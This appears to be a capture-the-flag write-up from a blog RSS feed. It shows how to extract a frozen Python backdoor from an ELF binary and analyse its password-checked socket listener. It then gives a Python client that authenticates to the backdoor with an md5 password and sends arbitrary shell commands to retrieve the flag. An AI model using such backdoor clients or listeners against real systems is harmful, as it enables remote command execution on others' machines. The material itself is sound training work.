&lt;p&gt;Pydata is a section that indicates this binary is actually a &amp;ldquo;frozen&amp;rdquo; python script that has been packaged with all needed dependencies inside an ELF file. This makes it fairly portable and also accounts for the size of the binary.&lt;/p&gt;
&lt;p&gt;The next step is to extract the python from this executable. After that, it should be readable like any other python script. First, objcopy is used to extract pydata.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;nightwolf@archlinux ~/CTF/cyber-apocalypse/ % objcopy --dump-section pydata&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;pydat.out bd
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can then be feed to &lt;code&gt;pydecipher&lt;/code&gt; to decompress the actual python code.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;nightwolf@archlinux ~/CTF/cyber-apocalypse/ % ~/.local/bin/pydecipher -d -v bd
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An output folder is created that contains all the decompressed data.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-pythoncode.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The majority of this is dependencies &lt;code&gt;db.py&lt;/code&gt; is is the most interesting. It contains an simple socket implementation that listens for connections providing the md5 sum of a specific string and then executing commands that follow.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-dbpy.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note: the local version of the script as show isn&amp;rsquo;t quiet right. All the strings need to be typed as bytes but weren&amp;rsquo;t by the extractor.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;With this info, a script can be created that opens a connection with the remote target, sends &lt;code&gt;s4v3_th3_w0rld&lt;/code&gt;, and then executes commands to retrieve the flag.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/usr/bin/python3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; socket
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; readline
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;from&lt;/span&gt; hashlib &lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; md5
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;server &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;port &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;4433&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;password &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;b&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;s4v3_th3_w0rld&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;True&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; command &lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;exit&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        print(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Exiting...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        exit()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    data &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; ( &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; command:&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; command)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;socket(socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;AF_INET, socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;SOCK_STREAM)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;connect((server, port))
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;sendall((md5(password)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;hexdigest() &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; command:&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; data)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;encode())
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    print(s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;recv(&lt;span style=&#34;color:#ae81ff&#34;&gt;4096&lt;/span&gt;)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;decode())
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;close()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s important to remember the server will only receive 32 bytes of data. Anything sent beyond that will be cut off and likely cause an error.&lt;/p&gt;
</description>
    </item>
    
  </channel>
</rss>